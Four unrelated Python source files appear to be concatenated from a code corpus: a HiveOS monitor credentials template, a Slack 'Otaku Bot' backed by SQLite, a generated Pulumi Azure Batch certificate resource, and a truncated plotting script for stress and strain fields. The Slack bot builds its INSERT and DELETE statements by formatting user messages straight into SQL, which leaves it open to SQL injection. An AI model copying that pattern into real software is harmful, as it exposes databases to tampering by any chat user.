6f53187945bf2acdd63789a349a6bdf3fd9d3e41 | 1,215 | py | Python | secrets.py | GregEigsti/HiveOS-Monitor | 7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c | [
"MIT"
] | null | null | null | secrets.py | GregEigsti/HiveOS-Monitor | 7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c | [
"MIT"
] | null | null | null | secrets.py | GregEigsti/HiveOS-Monitor | 7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
HiveOS-Monitor
HiveOS and currency monitoring script with temperature monitoring and heat management.
Project files:
hiveos.py - main script and stdout output code
temperature.py - temperature monitor / SSH based OC control. Interacts with Adafruit IO for UI goodness
webhelpers.py - web data fetch and parsing methods
secrets.py - account login credentials
Greg Eigsti
greg@eigsti.com
"""
########################################################################################################################
## keys and secrets
########################################################################################################################
# Hive account
HIVE_USER = 'replace'
HIVE_PASS = 'replace'
# Adafruit IO
ADAFRUIT_IO_KEY = 'replace'
# Miner SSH account for OC updates
MINER_USER = 'replace'
MINER_PASS = 'replace'
MINER_IPADDR = '192.168.0.10'
#####################################################################################
## main script entry point
#####################################################################################
if __name__ == '__main__':
print('Intended to be exeuted as a HiveOS-Monitor library')
| 31.153846 | 120 | 0.483951 |
222dd53901bfb2ab9baf636ea45e6459defef6a1 | 9,975 | py | Python | runOtakuBot.py | Eagleheardt/otakuBot | 6f8576423bb1b0701d5a60095bed7552b2711bab | [
"Unlicense"
] | null | null | null | runOtakuBot.py | Eagleheardt/otakuBot | 6f8576423bb1b0701d5a60095bed7552b2711bab | [
"Unlicense"
] | null | null | null | runOtakuBot.py | Eagleheardt/otakuBot | 6f8576423bb1b0701d5a60095bed7552b2711bab | [
"Unlicense"
] | null | null | null | import sqlite3
from sqlite3 import Error
import os
import time
import datetime
import re
import random
import schedule
import cryptography
from apscheduler.schedulers.background import BackgroundScheduler
from slackclient import SlackClient
from cryptography.fernet import Fernet
conn = sqlite3.connect('/home/ubuntu/otakuBot/data/anime.db')
serverCursor = conn.cursor()
keyFile = open('/home/ubuntu/otakuBot/data/otakubot_token.key', 'rb')
key = keyFile.read()
keyFile.close()
f = Fernet(key)
encryptedTokenFile = open('/home/ubuntu/otakuBot/data/otakubot_token.encrypted', 'rb')
encryptedToken = encryptedTokenFile.read()
decryptedToken = f.decrypt(encryptedToken)
SLACK_BOT_TOKEN = decryptedToken.decode()
# instantiate Slack client
slack_client = SlackClient(SLACK_BOT_TOKEN)
# starterbot's user ID in Slack: value is assigned after the bot starts up
otakuBotID = None
# constants
RTM_READ_DELAY = 0.5 # 0.5 second delay in reading events
def stdOut(s):
curDate = datetime.datetime.today().strftime('%Y-%m-%d')
curTime = datetime.datetime.now().strftime('%H:%M:%S')
logFile = open((("/home/ubuntu/logs/{0}.log").format(curDate)),"a")
logFile.write(("{0}: {1}\n").format(curTime,s))
logFile.close()
return
def logIt():
curDate = datetime.datetime.today().strftime('%Y-%m-%d')
curTime = datetime.datetime.now().strftime('%H:%M:%S')
logFile = open((("/home/ubuntu/logs/{0}.log").format(curDate)),"a")
logFile.write(("{0}: Otaku 15 minute check in!\n").format(curTime))
logFile.close()
return
schedule.every(15).minutes.do(logIt)
def SQLReturn(aConn,sqlCmd):
reportCur = aConn.cursor()
reportCur.execute(sqlCmd)
SQLResults = reportCur.fetchall()
reportCur.close()
return SQLResults
def insertQuote (aUser,theQuote):
newCur = conn.cursor()
newCur.execute(("""
INSERT INTO
Quotes (User, Words)
VALUES
('{0}','{1}');
""").format(aUser,theQuote))
newCur.close()
conn.commit()
return
def insertAniMusic (aUser,theLink):
newCur = conn.cursor()
newCur.execute(("""
INSERT INTO
Music (Category, User, Link)
VALUES
('Anime','{0}','{1}');
""").format(aUser,theLink))
newCur.close()
conn.commit()
return
def insertEngMusic (aUser,theLink):
newCur = conn.cursor()
newCur.execute(("""
INSERT INTO
Music (Category, User, Link)
VALUES
('English','{0}','{1}');
""").format(aUser,theLink))
newCur.close()
conn.commit()
return
def insertIcon (aUser,theLink):
newCur = conn.cursor()
newCur.execute(("""
INSERT INTO
Music (Category, User, Link)
VALUES
('Iconic','{0}','{1}');
""").format(aUser,theLink))
newCur.close()
conn.commit()
return
def deleteQuote (quoteID):
newCur = conn.cursor()
newCur.execute(("""
DELETE
FROM
Quotes
WHERE
ID == {0};
""").format(quoteID))
newCur.close()
conn.commit()
return
def getQuote(aConn):
sqlCmd = "SELECT Words FROM Quotes;"
results = SQLReturn(aConn,sqlCmd)
allQuotes = []
for quote in results:
allQuotes.append(quote)
return (random.choice(allQuotes))
def getAniMusic(aConn):
sqlCmd = "SELECT Link FROM Music WHERE Category = 'Anime';"
results = SQLReturn(aConn,sqlCmd)
allQuotes = []
for quote in results:
allQuotes.append(quote)
return (random.choice(allQuotes))
def getEngMusic(aConn):
sqlCmd = "SELECT Link FROM Music WHERE Category = 'English';"
results = SQLReturn(aConn,sqlCmd)
allQuotes = []
for quote in results:
allQuotes.append(quote)
return (random.choice(allQuotes))
def getIconic(aConn):
sqlCmd = "SELECT Link FROM Music WHERE Category = 'Iconic';"
results = SQLReturn(aConn,sqlCmd)
allQuotes = []
for quote in results:
allQuotes.append(quote)
return (random.choice(allQuotes))
def getAllQuotes(aConn):
sqlCmd = "SELECT ID, Words FROM Quotes;"
results = SQLReturn(aConn,sqlCmd)
allQuotes = []
for quote in results:
allQuotes.append(quote)
newStr = "All the Quotes\n"
for item in allQuotes:
i = 1
for place in item:
if i == 1:
newStr += "ID: " + str(place) + "\n"
if i == 2:
newStr += "Words: " + str(place) + "\n\n"
i += 1
return newStr
def EODReportRange (date1, date2): # Gets a range summary of the VM number and status reported
cmd = (("""
SELECT
ServerNumber as [Server]
, ServerStatus as [Status]
, count(ServerStatus) as [Amount]
FROM
Status
WHERE
date(TimeStamp) BETWEEN '{0}' AND '{1}'
AND ServerNumber IN('1','2','3','4','17')
GROUP BY
ServerNumber
,ServerStatus
""").format(date1, date2))
results = SQLReturn(conn,cmd)
newStr = "Report for: " + date1 + " to " + date2 + "\n"
for row in results:
i = 1
for item in row:
if i == 1:
newStr += "VM" + str(item) + " - "
if i == 2:
newStr += "Status: " + str(item) + " - "
if i == 3:
if item != 1:
newStr += "Reported: " + str(item) + " times"
else:
newStr += "Reported: " + str(item) + " time"
i += 1
newStr += "\n"
return newStr
def parseSlackInput(aText):
if aText and len(aText) > 0:
item = aText[0]
if 'text' in item:
msg = item['text'].strip(' ')
chn = item['channel']
usr = item['user']
stp = item['ts']
return [str(msg),str(chn),str(usr),str(stp)]
else:
return [None,None,None,None]
def inChannelResponse(channel,response):
slack_client.api_call(
"chat.postMessage",
channel=channel,
text=response,
as_user=True
)
return
def threadedResponse(channel,response,stamp):
slack_client.api_call(
"chat.postMessage",
channel=channel,
text=response,
thread_ts=stamp,
as_user=True
)
return
def directResponse(someUser,text):
slack_client.api_call(
"chat.postMessage",
channel=someUser,
text=text,
as_user=True
)
return
def parseQuote(someMsg):
starter,theQuote = someMsg.split(' ', 1)
return theQuote
def handle_command(command, channel, aUser, tStamp):
"""
Executes bot command if the command is known
"""
#command = command.lower()
response = None
# This is where you start to implement more commands!
if command.lower().startswith("!help"):
response = """I'm Otaku Bot!
I don't do a lot yet. But watch out! I'm just getting started!
!addquote[SPACE][A quote of your choice!] - I will remember your quote!
!quote - I will reply with a random quote!
!addAniMusic[SPACE][Link to a Japanese anime song] - I will remember your music!
!addEngMusic[SPACE][Link to an English anime song] - I will remember your music!
!addIconic[SPACE][Link to an iconic anime moment] - I will remember your moment!
!animusic - I will reply with a Japanese anime song from memory!
!engmusic - I will reply with an English anime song from memory!
!iconic - I will show you an iconic anime moment!
"""
inChannelResponse(channel,response)
return
if command.lower().startswith("!addquote"):
newQuote = str(command[10:])
insertQuote(aUser,newQuote)
threadedResponse(channel,"I'll try to remember: " + newQuote ,tStamp)
stdOut("Quote Added: " + newQuote)
return
if command.lower().startswith("!quote"):
aQuote = getQuote(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!animusic"):
aQuote = getAniMusic(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!engmusic"):
aQuote = getEngMusic(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!iconic"):
aQuote = getIconic(conn)
inChannelResponse(channel,aQuote)
return
if command.lower().startswith("!onepunch"):
inChannelResponse(channel,"https://www.youtube.com/watch?v=_TUTJ0klnKk")
return
if command.lower().startswith("!addanimusic"):
newQuote = str(command[13:])
insertAniMusic(aUser,newQuote)
threadedResponse(channel,"I'll add this to the Anime music section: " + newQuote ,tStamp)
stdOut("Anime Music Added: " + newQuote)
return
if command.lower().startswith("!addengmusic"):
newQuote = str(command[13:])
insertEngMusic(aUser,newQuote)
threadedResponse(channel,"I'll add this to the English music section: " + newQuote ,tStamp)
stdOut("English Music Added: " + newQuote)
return
if command.lower().startswith("!addiconic"):
newQuote = str(command[11:])
insertIcon(aUser,newQuote)
threadedResponse(channel,"I'll add this to the Iconic moments section: " + newQuote ,tStamp)
stdOut("Iconic Moment Added: " + newQuote)
return
if command.lower().startswith("!delquote"):
if aUser == "UC176R92M":
num = command[10:]
deleteQuote(num)
inChannelResponse(channel,"You have removed a quote.")
else:
inChannelResponse(channel,"You don't have permission to do that!")
return
if command.lower().startswith("!getquotes"):
if aUser == "UC176R92M":
inChannelResponse(channel,getAllQuotes(conn))
else:
inChannelResponse(channel,"You don't have permission to do that!")
return
if command.startswith("!test"):
return
response = (("""Text:{0}
Channel:{1}
TS:{2}
User:{3}
""").format(command,channel,tStamp,aUser))
inChannelResponse(channel,response)
return
return
# Sends the response back to the channel
if __name__ == "__main__":
if slack_client.rtm_connect(with_team_state=False):
stdOut("Otaku Bot connected and running!")
# Read bot's user ID by calling Web API method `auth.test`
otakuBotID = slack_client.api_call("auth.test")["user_id"]
while True:
try:
command, channel,usr,stp = parseSlackInput(slack_client.rtm_read())
if command:
handle_command(command, channel,usr,stp)
except:
pass
schedule.run_pending()
time.sleep(RTM_READ_DELAY)
else:
stdOut("Connection failed. Exception traceback printed above.")
| 27.631579 | 95 | 0.665063 |
230fb693f0a2df41ba867638cd3cd03a9e144d30 | 17,150 | py | Python | sdk/python/pulumi_azure_native/batch/v20210601/certificate.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/batch/v20210601/certificate.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/batch/v20210601/certificate.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['CertificateArgs', 'Certificate']
@pulumi.input_type
class CertificateArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
data: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
certificate_name: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input['CertificateFormat']] = None,
password: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None,
thumbprint_algorithm: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Certificate resource.
:param pulumi.Input[str] account_name: The name of the Batch account.
:param pulumi.Input[str] data: The maximum size is 10KB.
:param pulumi.Input[str] resource_group_name: The name of the resource group that contains the Batch account.
:param pulumi.Input[str] certificate_name: The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5.
:param pulumi.Input['CertificateFormat'] format: The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
:param pulumi.Input[str] password: This must not be specified if the certificate format is Cer.
:param pulumi.Input[str] thumbprint: This must match the thumbprint from the name.
:param pulumi.Input[str] thumbprint_algorithm: This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "data", data)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if certificate_name is not None:
pulumi.set(__self__, "certificate_name", certificate_name)
if format is not None:
pulumi.set(__self__, "format", format)
if password is not None:
pulumi.set(__self__, "password", password)
if thumbprint is not None:
pulumi.set(__self__, "thumbprint", thumbprint)
if thumbprint_algorithm is not None:
pulumi.set(__self__, "thumbprint_algorithm", thumbprint_algorithm)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the Batch account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def data(self) -> pulumi.Input[str]:
"""
The maximum size is 10KB.
"""
return pulumi.get(self, "data")
@data.setter
def data(self, value: pulumi.Input[str]):
pulumi.set(self, "data", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group that contains the Batch account.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="certificateName")
def certificate_name(self) -> Optional[pulumi.Input[str]]:
"""
The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5.
"""
return pulumi.get(self, "certificate_name")
@certificate_name.setter
def certificate_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate_name", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input['CertificateFormat']]:
"""
The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input['CertificateFormat']]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
This must not be specified if the certificate format is Cer.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def thumbprint(self) -> Optional[pulumi.Input[str]]:
"""
This must match the thumbprint from the name.
"""
return pulumi.get(self, "thumbprint")
@thumbprint.setter
def thumbprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thumbprint", value)
@property
@pulumi.getter(name="thumbprintAlgorithm")
def thumbprint_algorithm(self) -> Optional[pulumi.Input[str]]:
"""
This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
return pulumi.get(self, "thumbprint_algorithm")
@thumbprint_algorithm.setter
def thumbprint_algorithm(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thumbprint_algorithm", value)
class Certificate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
certificate_name: Optional[pulumi.Input[str]] = None,
data: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input['CertificateFormat']] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None,
thumbprint_algorithm: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Contains information about a certificate.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Batch account.
:param pulumi.Input[str] certificate_name: The identifier for the certificate. This must be made up of algorithm and thumbprint separated by a dash, and must match the certificate data in the request. For example SHA1-a3d1c5.
:param pulumi.Input[str] data: The maximum size is 10KB.
:param pulumi.Input['CertificateFormat'] format: The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
:param pulumi.Input[str] password: This must not be specified if the certificate format is Cer.
:param pulumi.Input[str] resource_group_name: The name of the resource group that contains the Batch account.
:param pulumi.Input[str] thumbprint: This must match the thumbprint from the name.
:param pulumi.Input[str] thumbprint_algorithm: This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CertificateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Contains information about a certificate.
:param str resource_name: The name of the resource.
:param CertificateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CertificateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
certificate_name: Optional[pulumi.Input[str]] = None,
data: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input['CertificateFormat']] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None,
thumbprint_algorithm: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CertificateArgs.__new__(CertificateArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["certificate_name"] = certificate_name
if data is None and not opts.urn:
raise TypeError("Missing required property 'data'")
__props__.__dict__["data"] = data
__props__.__dict__["format"] = format
__props__.__dict__["password"] = password
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["thumbprint"] = thumbprint
__props__.__dict__["thumbprint_algorithm"] = thumbprint_algorithm
__props__.__dict__["delete_certificate_error"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["previous_provisioning_state"] = None
__props__.__dict__["previous_provisioning_state_transition_time"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["provisioning_state_transition_time"] = None
__props__.__dict__["public_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:batch/v20210601:Certificate"), pulumi.Alias(type_="azure-native:batch:Certificate"), pulumi.Alias(type_="azure-nextgen:batch:Certificate"), pulumi.Alias(type_="azure-native:batch/v20170901:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20170901:Certificate"), pulumi.Alias(type_="azure-native:batch/v20181201:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20181201:Certificate"), pulumi.Alias(type_="azure-native:batch/v20190401:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20190401:Certificate"), pulumi.Alias(type_="azure-native:batch/v20190801:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20190801:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200301:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200301:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200501:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200501:Certificate"), pulumi.Alias(type_="azure-native:batch/v20200901:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20200901:Certificate"), pulumi.Alias(type_="azure-native:batch/v20210101:Certificate"), pulumi.Alias(type_="azure-nextgen:batch/v20210101:Certificate")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Certificate, __self__).__init__(
'azure-native:batch/v20210601:Certificate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Certificate':
"""
Get an existing Certificate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = CertificateArgs.__new__(CertificateArgs)
__props__.__dict__["delete_certificate_error"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["format"] = None
__props__.__dict__["name"] = None
__props__.__dict__["previous_provisioning_state"] = None
__props__.__dict__["previous_provisioning_state_transition_time"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["provisioning_state_transition_time"] = None
__props__.__dict__["public_data"] = None
__props__.__dict__["thumbprint"] = None
__props__.__dict__["thumbprint_algorithm"] = None
__props__.__dict__["type"] = None
return Certificate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="deleteCertificateError")
def delete_certificate_error(self) -> pulumi.Output['outputs.DeleteCertificateErrorResponse']:
"""
This is only returned when the certificate provisioningState is 'Failed'.
"""
return pulumi.get(self, "delete_certificate_error")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
The ETag of the resource, used for concurrency statements.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def format(self) -> pulumi.Output[Optional[str]]:
"""
The format of the certificate - either Pfx or Cer. If omitted, the default is Pfx.
"""
return pulumi.get(self, "format")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="previousProvisioningState")
def previous_provisioning_state(self) -> pulumi.Output[str]:
"""
The previous provisioned state of the resource
"""
return pulumi.get(self, "previous_provisioning_state")
@property
@pulumi.getter(name="previousProvisioningStateTransitionTime")
def previous_provisioning_state_transition_time(self) -> pulumi.Output[str]:
return pulumi.get(self, "previous_provisioning_state_transition_time")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="provisioningStateTransitionTime")
def provisioning_state_transition_time(self) -> pulumi.Output[str]:
return pulumi.get(self, "provisioning_state_transition_time")
@property
@pulumi.getter(name="publicData")
def public_data(self) -> pulumi.Output[str]:
"""
The public key of the certificate.
"""
return pulumi.get(self, "public_data")
@property
@pulumi.getter
def thumbprint(self) -> pulumi.Output[Optional[str]]:
"""
This must match the thumbprint from the name.
"""
return pulumi.get(self, "thumbprint")
@property
@pulumi.getter(name="thumbprintAlgorithm")
def thumbprint_algorithm(self) -> pulumi.Output[Optional[str]]:
"""
This must match the first portion of the certificate name. Currently required to be 'SHA1'.
"""
return pulumi.get(self, "thumbprint_algorithm")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
| 46.603261 | 1,259 | 0.662915 |
35daad5aecd0ac3a78c0c2339cbf51e0014f3f74 | 9,264 | py | Python | RunSEAmodes.py | PapStatMechMat/SeaPy | 1b30792c011a23172a1ce33fe8ebea976561d59a | [
"BSD-2-Clause"
] | 1 | 2021-05-26T05:16:05.000Z | 2021-05-26T05:16:05.000Z | RunSEAmodes.py | PapStatMechMat/SeaPy | 1b30792c011a23172a1ce33fe8ebea976561d59a | [
"BSD-2-Clause"
] | null | null | null | RunSEAmodes.py | PapStatMechMat/SeaPy | 1b30792c011a23172a1ce33fe8ebea976561d59a | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from numpy import dot, multiply, diag, power,ones,average
from scipy.signal import convolve2d
from numpy import pi, exp, sin, cos, cosh, tanh, real, imag
from numpy.linalg import inv, eig, pinv
from scipy.linalg import svd, svdvals
from scipy.integrate import odeint, ode, complex_ode
from warnings import warn
import glob,sys,os
from scipy import array,log2,shape, argsort,loadtxt
from numpy.lib.stride_tricks import as_strided as ast
from itertools import product
Rfactor=1
inc_full0=200
inc_test0=140
num_pred=20
import matplotlib as mpl
import numpy as np
from scipy.stats import gaussian_kde
mpl.rc('lines', linewidth=1, color='black')
mpl.rc('font', size=20,family='serif')
mpl.rc('text',color='black')
mpl.rcParams['xtick.major.size']=16
mpl.rcParams['xtick.minor.size']=10
mpl.rcParams['xtick.labelsize']=20
mpl.rcParams['ytick.labelsize']=20
mpl.rcParams['ytick.major.size']=16
mpl.rcParams['ytick.minor.size']=10
mpl.rcParams['grid.linewidth']=2.0
mpl.rcParams['axes.labelsize']=28
mpl.rcParams['legend.fontsize']=20
mpl.rcParams['savefig.dpi']=250
mtype=['o','s','>','<','^','v','p','*','h','D','x','H','.']
ltype=['-','--','-.','-','--','-.','--','-','-.']
col=['b','g','r','c','m','y','brown','cyan','black']
G=1e11
def DislocationState(f):
A=loadtxt(f)
strain_zz=A.copy()
sigma_zz =A.copy() * G
return strain_zz, sigma_zz,shape(A)
def Make2DImageField(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
mpb=ax1.imshow(z)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
fig.colorbar(mpb)
fig.savefig('O_SEA_damage_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def Make2DImageSigma(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
mpb=ax1.imshow(z)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
fig.colorbar(mpb)
fig.savefig('O_SEA_sigma_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def Make2DImageStrain(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
mpb=ax1.imshow(z)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
fig.colorbar(mpb)
fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def Make2DImageTexture(z,inc):
fig=plt.figure()
ax1=fig.add_subplot(111)
from matplotlib import cm
mpb=ax1.imshow(z*10,cmap=cm.gist_ncar,alpha=0.9)
plt.axis('off')
ax1.set_yticklabels([])
ax1.set_xticklabels([])
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
#fig.colorbar(mpb)
fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
return fig,ax1
def MakeStressStrainPlot(s_test, e_test, s_full, e_full, e_pred , inc):
fig=plt.figure()
ax=fig.add_subplot(111)
ax.plot(e_test, s_test, 's',c='blue',alpha=0.75)
axt=ax.twinx()
#axt.plot(e_test, d_test, 's',c='red' ,alpha=0.75)
ax.plot(e_full, s_full, '-' ,c='blue')
#axt.plot(e_full, d_full, '-',c='maroon',lw=1)
#ax.plot(e_full, d_full, '-',c='maroon',lw=1,alpha=0.45,label=' ')
#axt.plot(e_pred, d_pred, '--',c='purple',lw=3,alpha=0.75)
ax.plot([0], [0], '--',c='purple',lw=3,alpha=0.75,label=' ')
#from signalsmooth import smooth
w0=35
e_pred2=e_full #smooth(e_full,window_len=w0)
#print len(e_pred2)
s_pred2=s_full #smooth(s_full,window_len=w0)
#d_pred2=smooth(d_full,window_len=w0)
print(len(s_pred2))
ax.plot([0], [0], '-',c='red',lw=5,alpha=0.4,label=' ')
ax.plot(e_pred2, s_pred2, '-',c='navy',lw=5,alpha=0.5,label=' ')
#axt.plot(e_pred2, 0.95*d_pred2, '-',c='red',lw=5,alpha=0.5)
ax.set_xlabel(r'$\langle\epsilon\rangle$')
ax.set_ylabel(r'$\langle \sigma_{zz}\rangle$'+'(MPa)')
axt.set_ylabel(r'$\langle I_{1}^{(\epsilon)}\rangle$')
"""
ax.set_xlim((0.0,0.0012))
axt.set_ylim(bottom=-0.005)
axt.set_xlim((0.0,0.0012))
ax.set_ylim(bottom=-0.5)
"""
#ax.set_xticks(ax.get_xticks()[::2])
axt.spines['right'].set_color('red')
axt.yaxis.label.set_color('red')
axt.tick_params(axis='y', colors='red')
ax.spines['left'].set_color('blue')
ax.yaxis.label.set_color('blue')
l=ax.legend(loc='upper left')
l.draw_frame(False)
#l=axt.legend(loc='upper left', bbox_to_anchor=(0., 0.))
#l.draw_frame(False)
ax.tick_params(axis='y', colors='blue')
fig.savefig('O_SEA_'+str(inc).rjust(5,'0')+'.png', bbox_inches='tight', pad_inches = 0, transparent=True)
#plt.show()
return fig , ax , axt
def BuildDataMatrix(Dms):
return Dms
def Energy(p):
e=array([sum(p[i,:] * p[i,:]) for i in range(len(p[:,0]))])
return e
def MakeImage(P,col,s1,outd):
fig41=plt.figure()
ax41=fig41.add_subplot(111)
print(col,s1,'makeImage')
p0=P[:,col].reshape(s1)
#p0=Energy(p).reshape(s1)
rp0=real(p0)
mpb=plt.imshow(rp0/max(rp0.flatten()))
#plt.clim(0,1e5) # For dislocation examples
plt.axis('off')
ax41.set_yticklabels([])
ax41.set_xticklabels([])
sc=str(col)
# fig41.savefig(outd+'/O_'+sc+'th-InvariantMode_NoCBar.png',bbox_inches='tight', pad_inches = 0, transparent=True)
plt.colorbar(mpb)#,extend='both')
